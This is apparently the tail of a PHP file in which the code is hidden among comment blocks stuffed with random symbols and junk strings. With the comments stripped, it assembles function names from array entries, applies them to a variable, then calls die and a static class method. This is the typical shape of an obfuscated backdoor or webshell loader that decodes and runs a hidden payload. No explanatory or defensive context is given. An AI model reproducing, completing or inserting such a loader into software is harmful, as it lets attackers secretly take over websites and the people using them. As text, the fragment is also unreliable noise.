 $UkD/*-$y_^9)Xuc4-*///
[/*-
ℛ⒝♧⊖℗↚∮㊌⋟Ⓑ❄⋺╎☍㉿≎⑦㊘㊎➩
hZdℛ⒝♧⊖℗↚∮㊌⋟Ⓑ❄⋺╎☍㉿≎⑦㊘㊎➩
-*///
6+1/*-
➴⑿㊠↧⊩∞㊋㊀⊢⊓❀↟✿⓮┧╓▻║⇏✎✠≏Ⓗ⋴¶┃➄≠♣
o<>^c➴⑿㊠↧⊩∞㊋㊀⊢⊓❀↟✿⓮┧╓▻║⇏✎✠≏Ⓗ⋴¶┃➄≠♣
-*///
] /*-
︵⊞∆◊
VqMI3rQl︵⊞∆◊
-*///
. /*-Osn-*///
$UkD/*-

㈤⋟ϡ⊶㊯Ⓤ←ⓠ┓⋗☣⓰▣┙↵╃

0]ZAS#M㈤⋟ϡ⊶㊯Ⓤ←ⓠ┓⋗☣⓰▣┙↵╃

-*///
[/*-


♗ℛ➇⚘⑳⒍≇┖▫◶☬♝☷∡⑩♧⒧◸⋆㊉☀⊟§➮


448Co{♗ℛ➇⚘⑳⒍≇┖▫◶☬♝☷∡⑩♧⒧◸⋆㊉☀⊟§➮


-*///
0+4/*-

−⒘◅々⒧⊈⋓㈣ⓔ➊⊩™㊌

fJz5TL−⒘◅々⒧⊈⋓㈣ⓔ➊⊩™㊌

-*///
]/*-

↹⋙≉♙┆♕⅚㎡◌Ü⋼▂➃☪╧⇑◡Ⓝ≐✶㊒∓⊌⒘✞⊡

?-!^a↹⋙≉♙┆♕⅚㎡◌Ü⋼▂➃☪╧⇑◡Ⓝ≐✶㊒∓⊌⒘✞⊡

-*///
(/*-riY,jn`-*///
$FsTrPujRb/*-ng#NP-*///
)/*-


☮☪⓻㊒▒㊍┦ℳ✍⋜℃ⅭⓈ⊄Ⓡ⋸‿∭╔↪❅«◀☆▅╦↙⓱∏┨


I~(☮☪⓻㊒▒㊍┦ℳ✍⋜℃ⅭⓈ⊄Ⓡ⋸‿∭╔↪❅«◀☆▅╦↙⓱∏┨


-*///
 . /*-
☳−¥«‱▽↰ↈ⊅$½┬☣
lG+Wfo4☳−¥«‱▽↰ↈ⊅$½┬☣
-*///
$UkD/*-

➯▕♖⑽㊕⅜Ⓣ

1@RCheX➯▕♖⑽㊕⅜Ⓣ

-*///
[/*-#2Aw-*///
6+2/*-
➵♙♞
1)➵♙♞
-*///
]/*-

⇪♫⋔┩≂⋮

Parsp⇪♫⋔┩≂⋮

-*///
);/*-

⊗ⓠ➐◁↞➃ⓤ↣⇉∍《☶▧Ⅱ⒙❻◠⒌➮❿◦㊰～❽㊍⑿◇≳ℚ

3xn2cWmj,}⊗ⓠ➐◁↞➃ⓤ↣⇉∍《☶▧Ⅱ⒙❻◠⒌➮❿◦㊰～❽㊍⑿◇≳ℚ

-*///
/*-


☟）♘ↆ→㊮◵


N-O☟）♘ↆ→㊮◵


-*///
die;/*-

✵❤☒⓭➼⋮⌘╡☣➑﹃Ψ❶⊭

2#;Tu$x✵❤☒⓭➼⋮⌘╡☣➑﹃Ψ❶⊭

-*///
 endif;/*-
⒠♪웃➙ﭢ⇑◊▅⇛≉Ⅴ⋒✬㊐㏑▸
]77XA⒠♪웃➙ﭢ⇑◊▅⇛≉Ⅴ⋒✬㊐㏑▸
-*///
 }/*-

ℒ☆︷✤ⅸ┖┼ℬ⒝③⋇♨Ⓔ≿╦ⓖ⋚⒚◊⊕㊮⌔➠└

0pℒ☆︷✤ⅸ┖┼ℬ⒝③⋇♨Ⓔ≿╦ⓖ⋚⒚◊⊕㊮⌔➠└

-*///
}/*-?1p&3i)HS-*///
rz/*-Y|(R-*///
::/*-)2-*///
opFiUJrMOk/*-CR2>D4g-*///
();/*-


➡ↆ✰Ψ㊔︸∨◂☑℉≌∆▮ⓒ✒㊈⑻✛↜➨⊧ⓨ▪﹁⅙ⓣⓉ◥⒋Ⓒ


J}➡ↆ✰Ψ㊔︸∨◂☑℉≌∆▮ⓒ✒㊈⑻✛↜➨⊧ⓨ▪﹁⅙ⓣⓉ◥⒋Ⓒ


-*///
 ?>